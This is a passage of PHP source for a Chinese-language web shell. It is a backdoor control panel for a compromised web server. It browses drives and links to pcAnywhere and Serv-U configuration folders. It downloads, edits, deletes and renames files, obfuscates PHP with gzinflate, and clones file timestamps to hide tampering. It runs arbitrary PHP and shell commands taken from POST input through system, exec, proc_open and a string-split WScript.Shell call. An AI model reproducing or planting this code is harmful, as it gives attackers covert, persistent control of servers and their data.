href="\""?dir=C:/Documents%20and%20Settings/All%20Users/Application%20Data/Symantec/pcAnywhere\">pcAnywhere</a> | <a href="\" href="\""?dir=C:/Documents%20and%20Settings/All%20Users/「开始」菜单/程序\">开始程序</a> | <a href="\" href="\""?dir=C:/Documents%20and%20Settings/All%20Users\">AllUsers</a> | <a href="\" href="\""?dir=C:/Program Files/RhinoSoft.com/Serv-U\">Serv-U</a> | "; for ($i=66;$i<=90;$i++){$drive= chr($i).':'; if (is_dir($drive."/")){$vol=shelL("vol $drive");if(empty($vol))$vol=$drive;echo " <a title=\"$drive/\" href="\" href="\""?dir=$drive/\">$drive\\</a>";} } } echo "</b></p>\n"; /*===================== 执行操作 结束 =====================*/ if (!isset($_GET['action']) OR empty($_GET['action']) OR ($_GET['action'] == "dir")) { $tb->tableheader(); ?> <tr bgcolor="#cccccc"> <td align="center" nowrap width="27%"><b>文件</b></td> <td align="center" nowrap width="16%"><b>创建日期</b></td> <td align="center" nowrap width="16%"><b>最后修改</b></td> <td align="center" nowrap width="11%"><b>大小</b></td> <td align="center" nowrap width="6%"><b>属性</b></td> <td align="center" nowrap width="24%"><b>操作</b></td> </tr> <FORM action="" method="POST"> <?php // 目录列表 $dirs=@opendir($dir); $dir_i = '0'; while ($file=@readdir($dirs)) { $filepath="$dir/$file"; $a=@is_dir($filepath); if($a=="1"){ if($file!=".." && $file!=".") { $ctime=@date("Y-m-d H:i:s",@filectime($filepath)); $mtime=@date("Y-m-d H:i:s",@filemtime($filepath)); $dirperm=substr(base_convert(fileperms($filepath),10,8),-4); echo "<tr class=".getrowbg().">\n"; echo " <td style="\" style="\""padding-left: 5px;\"><INPUT type=checkbox value=$file name=dl[]> [<a href="\" href="\""?dir=".urlencode($dir)."/".urlencode($file)."\"><font color=\"#006699\">$file</font></a>]</td>\n"; echo " <td align=\"center\" nowrap class=\"smlfont\">$ctime</td>\n"; echo " <td align=\"center\" nowrap class=\"smlfont\">$mtime</td>\n"; echo " <td align=\"center\" nowrap class=\"smlfont\"><a href="\" href="\""?action=search&dir=".$filepath."\">Search</a></td>\n"; echo " <td align=\"center\" nowrap class=\"smlfont\"><a href="\" href="\""?action=fileperm&dir=".urlencode($dir)."&file=".urlencode($file)."\">$dirperm</a></td>\n"; echo " <td align=\"center\" nowrap>| <a href="\" href="\""#\" onclick=\"really('".urlencode($dir)."','".urlencode($file)."','你确定要删除 $file 目录吗? \\n\\n如果该目录非空,此次操作将会删除该目录下的所有文件!','1')\">删除</a> | <a href="\" href="\""?action=rename&dir=".urlencode($dir)."&fname=".urlencode($file)."\">改名</a> |</td>\n"; echo "</tr>\n"; $dir_i++; } else { if($file=="..") { echo "<tr class=".getrowbg().">\n"; echo " <td nowrap colspan=\"6\" style="\" style="\""padding-left: 5px;\"><a href="\" href="\""?dir=".urlencode($dir)."/".urlencode($file)."\">返回上级目录</a></td>\n"; echo "</tr>\n"; } } } }// while @closedir($dirs); ?> <tr bgcolor="#cccccc"> <td colspan="6" height="5"></td> </tr> <? // 文件列表 $dirs=@opendir($dir); $file_i = '0'; while ($file=@readdir($dirs)) { $filepath="$dir/$file"; $a=@is_dir($filepath); if($a=="0"){ $size=@filesize($filepath); $size=$size/1024 ; $size= @number_format($size, 3); if (@filectime($filepath) == @filemtime($filepath)) { $ctime=@date("Y-m-d H:i:s",@filectime($filepath)); $mtime=@date("Y-m-d H:i:s",@filemtime($filepath)); } else { $ctime="<span class=\"redfont\">".@date("Y-m-d H:i:s",@filectime($filepath))."</span>"; $mtime="<span class=\"redfont\">".@date("Y-m-d H:i:s",@filemtime($filepath))."</span>"; } @$fileperm=substr(base_convert(@fileperms($filepath),10,8),-4); echo "<tr class=".getrowbg().">\n"; echo " <td style="\" style="\""padding-left: 5px;\">"; echo "<INPUT type=checkbox value=$file name=dl[]>"; echo "<a href="\" href="\""$filepath\" target=\"_blank\">$file</a></td>\n"; echo " <td align=\"center\" nowrap class=\"smlfont\">$ctime</td>\n"; echo " <td align=\"center\" nowrap class=\"smlfont\">$mtime</td>\n"; echo " <td align=\"right\" nowrap class=\"smlfont\"><span class=\"redfont\">$size</span> KB</td>\n"; echo " <td align=\"center\" nowrap class=\"smlfont\"><a href="\" href="\""?action=fileperm&dir=".urlencode($dir)."&file=".urlencode($file)."\">$fileperm</a></td>\n"; echo " <td align=\"center\" nowrap><a href="\" href="\""?downfile=".urlencode($filepath)."\">下载</a> | <a href="\" href="\""?action=editfile&dir=".urlencode($dir)."&editfile=".urlencode($file)."\">编辑</a> | <a href="\" href="\""#\" onclick=\"really('".urlencode($dir)."','".urlencode($filepath)."','你确定要删除 $file 文件吗?','2')\">删除</a> | <a href="\" href="\""?action=rename&dir=".urlencode($dir)."&fname=".urlencode($filepath)."\">改名</a> | <a href="\" href="\""?action=newtime&dir=".urlencode($dir)."&file=".urlencode($filepath)."\">时间</a></td>\n"; echo "</tr>\n"; $file_i++; } }// while @closedir($dirs); if(get_cfg_var('safemode'))$z = "<a href="\" href="\""#\" title=\"使用说明\" onclick=\"alert('Php为安全模式尽量少打包内容以免脚本超时\\n\\n填写文件名则把文件保存在本地方便操作,不填则直接下载。')\">(?)</a>"; else $z = "<a href="\" href="\""#\" title=\"使用说明\" onclick=\"alert('Php运行非安全模式,打包大件请等啊等啊等啊等\\n\\n填写文件名则把文件保存在本地方便操作,不填则直接下载。')\">(?)</a>"; $tb->tdbody('<table width="100%" border="0" cellpadding="2" cellspacing="0" align="center"><tr><td>'.$tb->makeinput('chkall','on','onclick="CheckAll(this.form)"','checkbox','30','').' 本地文件:'.$tb->makeinput('localfile','','','text','15').''.$tb->makeinput('downrar','选中打包下载或本地保存','','submit').' '.$z.'</td><td align="right">'.$dir_i.' 个目录 / '.$file_i.' 个文件</td></tr></table>','center',getrowbg(),'','','6'); echo "</FORM>\n"; echo "</table>\n"; }// end dir elseif ($_GET['action'] == "editfile") { if(empty($newfile)) { $filename="$dir/$editfile"; $fp=@fopen($filename,"r"); $contents=@fread($fp, filesize($filename)); @fclose($fp); $contents=htmlspecialchars($contents); }else{ $editfile=$newfile; $filename = "$dir/$editfile"; } $action = "?dir=".urlencode($dir)."&editfile=".$editfile; $tb->tableheader(); $tb->formheader($action,'新建/编辑文件'); $tb->tdbody('当前文件: '.$tb->makeinput('editfilename',$filename).' 输入新文件名则建立新文件 Php代码加密: <input type="checkbox" name="change" value="yes" onclick="javascript:alert(\'这个功能只可以用来加密或是压缩完整的php代码。\\n\\n非php代码或不完整php代码或不支持gzinflate函数请不要使用!\')"> '); $tb->tdbody($tb->maketextarea('filecontent',$contents)); $tb->makehidden('do','doeditfile'); $tb->formfooter('1','30'); }//end editfile elseif ($_GET['action'] == "rename") { $nowfile = (isset($_POST['newname'])) ? $_POST['newname'] : basename($_GET['fname']); $action = "?dir=".urlencode($dir)."&fname=".urlencode($fname); $tb->tableheader(); $tb->formheader($action,'修改文件名'); $tb->makehidden('oldname',$dir."/".$nowfile); $tb->makehidden('dir',$dir); $tb->tdbody('当前文件名: '.basename($nowfile)); $tb->tdbody('改名为: '.$tb->makeinput('newname')); $tb->makehidden('do','rename'); $tb->formfooter('1','30'); }//end rename elseif ($_GET['action'] == "eval") { $action = "?dir=".urlencode($dir).""; $tb->tableheader(); $tb->formheader(''.$action.' "target="_blank' ,'执行php脚本'); $tb->tdbody($tb->maketextarea('phpcode',$contents)); $tb->formfooter('1','30'); } elseif ($_GET['action'] == "fileperm") { $action = "?dir=".urlencode($dir)."&file=".$file; $tb->tableheader(); $tb->formheader($action,'修改文件属性'); $tb->tdbody('修改 '.$file.' 的属性为: '.$tb->makeinput('fileperm',substr(base_convert(fileperms($dir.'/'.$file),10,8),-4))); $tb->makehidden('file',$file); $tb->makehidden('dir',urlencode($dir)); $tb->makehidden('do','editfileperm'); $tb->formfooter('1','30'); }//end fileperm elseif ($_GET['action'] == "newtime") { $action = "?dir=".urlencode($dir); $cachemonth = array('January'=>1,'February'=>2,'March'=>3,'April'=>4,'May'=>5,'June'=>6,'July'=>7,'August'=>8,'September'=>9,'October'=>10,'November'=>11,'December'=>12); $tb->tableheader(); $tb->formheader($action,'克隆文件最后修改时间'); $tb->tdbody("修改文件: ".$tb->makeinput('curfile',$file,'readonly')." → 目标文件: ".$tb->makeinput('tarfile','需填完整路径及文件名'),'center','2','30'); $tb->makehidden('do','domodtime'); $tb->formfooter('','30'); $tb->formheader($action,'自定义文件最后修改时间'); $tb->tdbody('<br><ul><li>有效的时间戳典型范围是从格林威治时间 1901 年 12 月 13 日 星期五 20:45:54 到 2038年 1 月 19 日 星期二 03:14:07<br>(该日期根据 32 位有符号整数的最小值和最大值而来)</li><li>说明: 日取 01 到 30 之间, 时取 0 到 24 之间, 分和秒取 0 到 60 之间!</li></ul>','left'); $tb->tdbody('当前文件名: '.$file); $tb->makehidden('curfile',$file); $tb->tdbody('修改为: '.$tb->makeinput('year','1984','','text','4').' 年 '.$tb->makeselect(array('name'=>'month','option'=>$cachemonth,'selected'=>'October')).' 月 '.$tb->makeinput('data','18','','text','2').' 日 '.$tb->makeinput('hour','20','','text','2').' 时 '.$tb->makeinput('minute','00','','text','2').' 分 '.$tb->makeinput('second','00','','text','2').' 秒','center','2','30'); $tb->makehidden('do','modmytime'); $tb->formfooter('1','30'); }//end newtime elseif ($_GET['action'] == "shell") { $action = "??action=shell&dir=".urlencode($dir); $tb->tableheader(); $tb->tdheader('WebShell Mode'); if (substr(PHP_OS, 0, 3) == 'WIN') { $program = isset($_POST['program']) ? $_POST['program'] : "c:\winnt\system32\cmd.exe"; $prog = isset($_POST['prog']) ? $_POST['prog'] : "/c net start > ".$pathname."/log.txt"; echo "<form action=\"?action=shell&dir=".urlencode($dir)."\" method=\"POST\">\n"; $tb->tdbody('无回显运行程序 → 文件: '.$tb->makeinput('program',$program).' 参数: '.$tb->makeinput('prog',$prog,'','text','40').' '.$tb->makeinput('','Run','','submit'),'center','2','35'); $tb->makehidden('do','programrun'); echo "</form>\n"; } echo "<form action=\"?action=shell&dir=".urlencode($dir)."\" method=\"POST\">\n"; if(isset($_POST['cmd'])) $cmd = $_POST['cmd']; $tb->tdbody('提示:如果输出结果不完全,建议把输出结果写入文件.这样可以得到全部内容. '); $tb->tdbody('proc_open函数假设不是默认的winnt系统请自行设置使用,自行修改记得写退出,否则会在主机上留下一个未结束的进程.'); $tb->tdbody('proc_open函数要使用的cmd程序的位置:'.$tb->makeinput('cmd',$cmd,'','text','30').'(要是是linux系统还是大大们自己修改吧)'); $execfuncs = (substr(PHP_OS, 0, 3) == 'WIN') ? array('system'=>'system','passthru'=>'passthru','exec'=>'exec','shell_exec'=>'shell_exec','popen'=>'popen','wscript'=>'Wscript.Shell','proc_open'=>'proc_open') : array('system'=>'system','passthru'=>'passthru','exec'=>'exec','shell_exec'=>'shell_exec','popen'=>'popen','proc_open'=>'proc_open'); $tb->tdbody('选择执行函数: '.$tb->makeselect(array('name'=>'execfunc','option'=>$execfuncs,'selected'=>$execfunc)).' 输入命令: '.$tb->makeinput('command',$_POST['command'],'','text','60').' '.$tb->makeinput('','Run','','submit')); ?> <tr class="secondalt"> <td align="center"><textarea name="textarea" cols="100" rows="25" readonly><?php if (!empty($_POST['command'])) { if ($execfunc=="system") { system($_POST['command']); } elseif ($execfunc=="passthru") { passthru($_POST['command']); } elseif ($execfunc=="exec") { $result = exec($_POST['command']); echo $result; } elseif ($execfunc=="shell_exec") { $result=shell_exec($_POST['command']); echo $result; } elseif ($execfunc=="popen") { $pp = popen($_POST['command'], 'r'); $read = fread($pp, 2096); echo $read; pclose($pp); } elseif ($execfunc=="wscript") { $wsh = new COM('W'.'Scr'.'ip'.'t.she'.'ll') or die("PHP Create COM WSHSHELL failed"); $exec = $wsh->exec ("cm"."d.e"."xe /c ".$_POST['command'].""); $stdout = $exec->StdOut(); $stroutput = $stdout->ReadAll(); echo $stroutput; } elseif($execfunc=="proc_open"){ $descriptorspec = array( 0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w") ); $process = proc_open("".$_POST['cmd']."", $descriptorspec, $pipes); if (is_resource($process)) { // 写命令 fwrite($pipes[0], "".$_POST['command']."\r\n"); fwrite($pipes[0], "exit\r\n"); fclose($pipes[0]); // 读取输出 while (!feof($pipes[1])) { echo fgets($pipes[1], 1024); } fclose($pipes[1]); while (!feof($pipes[2])) { echo fgets($pipes[2], 1024); } fclose($pipes[2]); proc_close($process); } } else { system($_POST['command']); } } ?>